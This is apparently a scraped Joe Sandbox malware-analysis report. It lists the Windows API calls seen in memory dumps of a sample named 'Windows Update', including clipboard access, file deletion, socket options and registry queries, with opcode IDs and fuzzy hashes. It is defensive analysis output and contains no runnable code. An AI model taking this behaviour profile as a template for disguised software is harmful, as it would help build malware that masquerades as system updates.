                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0064271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: b8b2b2511bc534b1aa66922d3ba770851c24e6115c4838d03d0714d7d516898d
                                                                                  • Instruction ID: e8f6e84e16ed42de3a583577b8dc4e4c0d08a040bd9e33bc90bf3e22c4a7c8a4
                                                                                  • Opcode Fuzzy Hash: b8b2b2511bc534b1aa66922d3ba770851c24e6115c4838d03d0714d7d516898d
                                                                                  • Instruction Fuzzy Hash: 9E11A1755087809FD721CF15DC49B92FFA4EF16320F09809AED854B263D275A808CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 0064138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: 54d6800063eff1a8c663bfc368ca3d720d11eca43e4b0fa4b9ea6c7a862fc2ee
                                                                                  • Instruction ID: efa59adf86f1ddacd5a7c4631d5acf51ff7099629bc1d1678af489a1eb1bffe5
                                                                                  • Opcode Fuzzy Hash: 54d6800063eff1a8c663bfc368ca3d720d11eca43e4b0fa4b9ea6c7a862fc2ee
                                                                                  • Instruction Fuzzy Hash: 58017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D335B915CAE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642E00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: c9b74aef713f5b23203fe9b7ef4494c99556a4f096054f6e5a6690efcf1cb9c4
                                                                                  • Instruction ID: e37b1ab98f9fac58fa554d7ff1f2b949707472e3396cecf4c59d3c2f5b363ff2
                                                                                  • Opcode Fuzzy Hash: c9b74aef713f5b23203fe9b7ef4494c99556a4f096054f6e5a6690efcf1cb9c4
                                                                                  • Instruction Fuzzy Hash: B901B171A00701CFEB10CF26DC857A6FB94EF00320F5880AAED09CB752D675E844CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FormatMessageW.KERNEL32(?,00000E40,?,?), ref: 006433F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 0fdff9859625b80fb9e1fb078c51cb67cc9e82f06fc7f9b8c0e62a4c6e89f356
                                                                                  • Instruction ID: a3318d30bccb1287e36a6848c3edf88e99d6acfb08ef0e7eb6d5b89aa79703d3
                                                                                  • Opcode Fuzzy Hash: 0fdff9859625b80fb9e1fb078c51cb67cc9e82f06fc7f9b8c0e62a4c6e89f356
                                                                                  • Instruction Fuzzy Hash: 3D017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D335B915CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID:
                                                                                  • API String ID: 2030045667-0
                                                                                  • Opcode ID: 47ffb0e645680534693350931d3841ec944d98a98d9ee83040b5382c9174132d
                                                                                  • Instruction ID: 3fa0580c01071ff8bad75664ceb293e60e282ac8c25ab9d58302e9b458e1a242
                                                                                  • Opcode Fuzzy Hash: 47ffb0e645680534693350931d3841ec944d98a98d9ee83040b5382c9174132d
                                                                                  • Instruction Fuzzy Hash: 7F019E71504740DFEB20DF15DC86B62FBE8EF14720F08809ADD498B31ADB71E884CA66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 00641A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: a2fe952bffa0b8f799cb638966c911857213f8f7185f983012d0696a56004502
                                                                                  • Instruction ID: 42e412bf337e3ce9c590b12f34ae297774f7d9925a7cafd0340810fe7dcbd403
                                                                                  • Opcode Fuzzy Hash: a2fe952bffa0b8f799cb638966c911857213f8f7185f983012d0696a56004502
                                                                                  • Instruction Fuzzy Hash: 7F018C725007409FEB20DF19D885BA6FBE9EB15720F088099ED498B752D371E884CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0011A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e73d9e45528d2a6d1b4e29065f8ff2d026cfe2c93398443239d00b9c3e36c0d1
                                                                                  • Instruction ID: ef1564a310001a2bf68ae3addd81ce1e8178aa0c6ac477bb8e4602b1fae79fff
                                                                                  • Opcode Fuzzy Hash: e73d9e45528d2a6d1b4e29065f8ff2d026cfe2c93398443239d00b9c3e36c0d1
                                                                                  • Instruction Fuzzy Hash: BC016972401700DFEB218F55DC84BA6FFE0EF18720F48C9AAEE494A612C376A454DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 90e1383c3980536d38e98cd299e19458c0d4d9fc7bbf2df657f4d065e726d9a8
                                                                                  • Instruction ID: 429821f4f2d9c29f4f0cafff5ad8cf1e0c114f7e2e4aea6a95d07baf9a66abbc
                                                                                  • Opcode Fuzzy Hash: 90e1383c3980536d38e98cd299e19458c0d4d9fc7bbf2df657f4d065e726d9a8
                                                                                  • Instruction Fuzzy Hash: E7018F71504744DFEB10DF16DC857A6FBE4EF06721F0884AADD498F342D675E884CAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0011B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 9c961db09b35b674dde32d5f28522b14f061417f9a888227b43881465f1bd62b
                                                                                  • Instruction ID: 074c8f342fe9fa9dcad301585c1099955c9fce9a6b5ac2e5a36a1345b03bdfb6
                                                                                  • Opcode Fuzzy Hash: 9c961db09b35b674dde32d5f28522b14f061417f9a888227b43881465f1bd62b
                                                                                  • Instruction Fuzzy Hash: 8F016D71900601ABE320DF16DD86B26FBB8FB88B20F14825AED085B741D375F955CAE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0011B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: d0928545df0d29834a52cceff70f1b58bd949f9184d0ae2cbea53944a8dbe043
                                                                                  • Instruction ID: 10d0e95a47113865045d1f956e63450047f7816644e37d23dc75c60f39ecf39a
                                                                                  • Opcode Fuzzy Hash: d0928545df0d29834a52cceff70f1b58bd949f9184d0ae2cbea53944a8dbe043
                                                                                  • Instruction Fuzzy Hash: 7E01BC72404744DFEB21CF55DC84BA6FFA0EF14324F0888AADE498B612C376A458DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EnumThreadWindows.USER32(?,00000E40,?,?), ref: 0011ADC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumThreadWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2941952884-0
                                                                                  • Opcode ID: 31bcedce303927967d5577a2f5ffb14a365f7a98628fe231a43bc33659a7a983
                                                                                  • Instruction ID: 74dc8a20898011162ec875b64284e29422c053b43c6573bc782291b0c19ab272
                                                                                  • Opcode Fuzzy Hash: 31bcedce303927967d5577a2f5ffb14a365f7a98628fe231a43bc33659a7a983
                                                                                  • Instruction Fuzzy Hash: AB01AD71900600ABE320DF16DC82B26FBB8FB88B20F14821AED084B741D231F915CBE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OleGetClipboard.OLE32(?,00000E40,?,?), ref: 00640142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Clipboard
                                                                                  • String ID:
                                                                                  • API String ID: 220874293-0
                                                                                  • Opcode ID: 6131e156bbf4b99499f1c7c35e79da0bd0f528d20966dded6ac6d3bac500f2c2
                                                                                  • Instruction ID: ae37d4dfa986cd1a980b830396690e33b41dfd43fa637fbaedfbfee7d3eefa7d
                                                                                  • Opcode Fuzzy Hash: 6131e156bbf4b99499f1c7c35e79da0bd0f528d20966dded6ac6d3bac500f2c2
                                                                                  • Instruction Fuzzy Hash: 71016D71900601ABE320DF16DD86B26FBB8FB88A20F14825AED085B741D275F955CAE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

APIs
• SHGetFolderPathW.SHELL32(?,00000E40,?,?), ref: 0064174E
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: FolderPath
• String ID:
• API String ID: 1514166925-0

APIs
• PeekMessageW.USER32(?,?,?,?,?), ref: 00645D0C
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: MessagePeek
• String ID:
• API String ID: 2222842502-0

APIs
• UnmapViewOfFile.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 006414D0
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: FileUnmapView
• String ID:
• API String ID: 2564024751-0

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0

APIs
• KiUserCallbackDispatcher.NTDLL(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00645BAC
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0

APIs
• FindClose.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642D34
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0

APIs
• GetForegroundWindow.USER32 ref: 0011A3D5
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0

APIs
• SendMessageW.USER32(?,?,?,?), ref: 006427C5
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0

APIs
• GetWindowPlacement.USER32(?,?), ref: 0064271F
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: PlacementWindow
• String ID:
• API String ID: 2154376794-0

APIs
• SetErrorMode.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A6CC
Memory Dump Source
• Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

APIs
• KiUserCallbackDispatcher.NTDLL ref: 004E79B4
Memory Dump Source
• Source File: 00000002.00000002.2110798495.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4e0000_Windows Update.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0

APIs
• KiUserCallbackDispatcher.NTDLL ref: 004E79B4
Memory Dump Source
• Source File: 00000002.00000002.2110798495.00000000004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_4e0000_Windows Update.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0

Strings
Memory Dump Source
• Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
Similarity
• API ID:
• String ID: VnRh
• API String ID: 0-1183825908

Strings
Memory Dump Source
• Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
Similarity
• API ID:
• String ID: VnRh
• API String ID: 0-1183825908

APIs
Memory Dump Source
• Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0

                                                                                  • Opcode ID: 28a68cdfa7dd8178d1a456d68c45839ca7a13247e4b73e58f9a3c4cf570bf764
                                                                                  • Instruction ID: 3fec904a649cb56d1eceece690caf613ae4c0a623416319941b482a4864925b1
                                                                                  • Opcode Fuzzy Hash: 28a68cdfa7dd8178d1a456d68c45839ca7a13247e4b73e58f9a3c4cf570bf764
                                                                                  • Instruction Fuzzy Hash: 62219871509380AFE721CF55DD45F96FFB8EF06310F0884AEE9449B292D375A904CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: VnRh
                                                                                  • API String ID: 0-1183825908
                                                                                  • Opcode ID: 8bc2e51aefc6c72028eed4216906ceaac8f0e492012f5bc18d7298694d665f61
                                                                                  • Instruction ID: 1a4d0dfb7c5e3885612538ae47d02407057f236dabf7f78c3e47843f97b2a7e5
                                                                                  • Opcode Fuzzy Hash: 8bc2e51aefc6c72028eed4216906ceaac8f0e492012f5bc18d7298694d665f61
                                                                                  • Instruction Fuzzy Hash: 9411E976544340AFD3118F16AC45AA7FFA4EF46630F08C8AFED489F212D276A504CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocLocal
                                                                                  • String ID:
                                                                                  • API String ID: 3494564517-0
                                                                                  • Opcode ID: 5ee18651975b925edce73d96faf3603fb06ec8e1aafcec2d7b625654f62552c9
                                                                                  • Instruction ID: 5520c4bdd945e5193f363770ea768b5db5e0e049a1c33b892f7079b2657f578f
                                                                                  • Opcode Fuzzy Hash: 5ee18651975b925edce73d96faf3603fb06ec8e1aafcec2d7b625654f62552c9
                                                                                  • Instruction Fuzzy Hash: 2711BE71504300EFF720DF55DC85BAAFBA8EF09720F5484AAED488B382D775A904CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 3853573aa8f998338d133c5c889304c84aac50a7e5fe08ed9a7608c3cceca36e
                                                                                  • Instruction ID: 2212ea4bb3fac864474af7f810d8aa858b6026ef38182090b751ac16302baf9d
                                                                                  • Opcode Fuzzy Hash: 3853573aa8f998338d133c5c889304c84aac50a7e5fe08ed9a7608c3cceca36e
                                                                                  • Instruction Fuzzy Hash: 2C11A7715093C09FD712CF25DC55B96BFA4EF02220F0884EBED898F653D2759948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LocalFree.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A8E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2826327444-0
                                                                                  • Opcode ID: f3614cbfaae64b9b751a6849f34c7c3a849abfa9c196ba5e2c138af1c2ea0702
                                                                                  • Instruction ID: 7cf7fc83c3835b0b9b288d40fcce8afd622cd8006706ba2e3ac03027f691d5d3
                                                                                  • Opcode Fuzzy Hash: f3614cbfaae64b9b751a6849f34c7c3a849abfa9c196ba5e2c138af1c2ea0702
                                                                                  • Instruction Fuzzy Hash: 2A1182715493849FD712CB15DC45B92BFB4EF06224F0884EAED458B253D276A948CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: 826ea89a47d8685b6877be3624331e837c2f2b9615136c37cc49a075a053d1f8
                                                                                  • Instruction ID: edd456db4fac67c04d0b30756014c7419dfeed016a84e892d0b32bdb05d6f891
                                                                                  • Opcode Fuzzy Hash: 826ea89a47d8685b6877be3624331e837c2f2b9615136c37cc49a075a053d1f8
                                                                                  • Instruction Fuzzy Hash: 2501F275901300CFEB14CF15DC857A6FF94EF00720F48C4BADC098B242D775A844CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LocalFree.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011A8E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLocal
                                                                                  • String ID:
                                                                                  • API String ID: 2826327444-0
                                                                                  • Opcode ID: b8a10781ff672d34be2be28613a7870bc2ab79df5655042cbb4f36a5a06c36e9
                                                                                  • Instruction ID: 045ce73ed646a5980dcfe992ede10051992d9cdc4200ec514d1d7d0a6981dc19
                                                                                  • Opcode Fuzzy Hash: b8a10781ff672d34be2be28613a7870bc2ab79df5655042cbb4f36a5a06c36e9
                                                                                  • Instruction Fuzzy Hash: C701AD71501344DFEB10CF15D8897A6FFA4EF00321F58C4AADD088B202D375A984CAA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e40e7c6457e8972aad57c3c62879c980e143c9b5793afa0b7441e24bda88826
                                                                                  • Instruction ID: 35ed6c42f69a88bb5d7e262290e2fb9b33eda5fcb73edf7200730a95585d17de
                                                                                  • Opcode Fuzzy Hash: 7e40e7c6457e8972aad57c3c62879c980e143c9b5793afa0b7441e24bda88826
                                                                                  • Instruction Fuzzy Hash: F8210CB6508304AFD350CF49EC41A57FBE8EB88660F14C92EFD4997311D276A9148BA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110422187.00000000001A2000.00000040.00000001.sdmp, Offset: 001A2000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_1a2000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b988b3270299d261c8a657ad88cab31d1452daf90c995c87e1904da97d64039
                                                                                  • Instruction ID: bc4d955dfa42190b8e3801065c4ab64c16289b4aa6560cbb8433a7121c01c990
                                                                                  • Opcode Fuzzy Hash: 0b988b3270299d261c8a657ad88cab31d1452daf90c995c87e1904da97d64039
                                                                                  • Instruction Fuzzy Hash: 2B211DB6508304AFD750CF09EC41A57FBE8EB88670F14C92EFD4997311D276E9148BA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b7619e54ecb7eade4a47130d6279fed4bb527720fb2959a510e835376a942c8c
                                                                                  • Instruction ID: 1896e63b581444b0d76de06ad8b13511ca00ed11435091c10ced0f488795f2e1
                                                                                  • Opcode Fuzzy Hash: b7619e54ecb7eade4a47130d6279fed4bb527720fb2959a510e835376a942c8c
                                                                                  • Instruction Fuzzy Hash: D421B4B5508341AFD340CF19D881A5BBBE4EB89664F04896EF89897311E275E9058BA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2113092891.00000000043F0000.00000040.00000001.sdmp, Offset: 043F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_43f0000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4785dffd1a50a299d9779577d9b03c17ecb1a890ee7c9e4ba9192db5167ca748
                                                                                  • Instruction ID: 4267eca555cb7afda3c42663ee879ef443643bba043f3ce7059d52ff4b1535ef
                                                                                  • Opcode Fuzzy Hash: 4785dffd1a50a299d9779577d9b03c17ecb1a890ee7c9e4ba9192db5167ca748
                                                                                  • Instruction Fuzzy Hash: F711B7B5908301AFD340CF19D881A5BFBE4FB88664F04896EF998D7311E271E9048FA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110887492.0000000000600000.00000040.00000040.sdmp, Offset: 00600000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_600000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 19bc690a4f737fec63811d5e63e0b9b3a4ced17f888838b65d588a5fa37892dc
                                                                                  • Instruction ID: ccede7782b0edf9216aed57dfd6d4ef7da750597489fed31310cb231651a00bc
                                                                                  • Opcode Fuzzy Hash: 19bc690a4f737fec63811d5e63e0b9b3a4ced17f888838b65d588a5fa37892dc
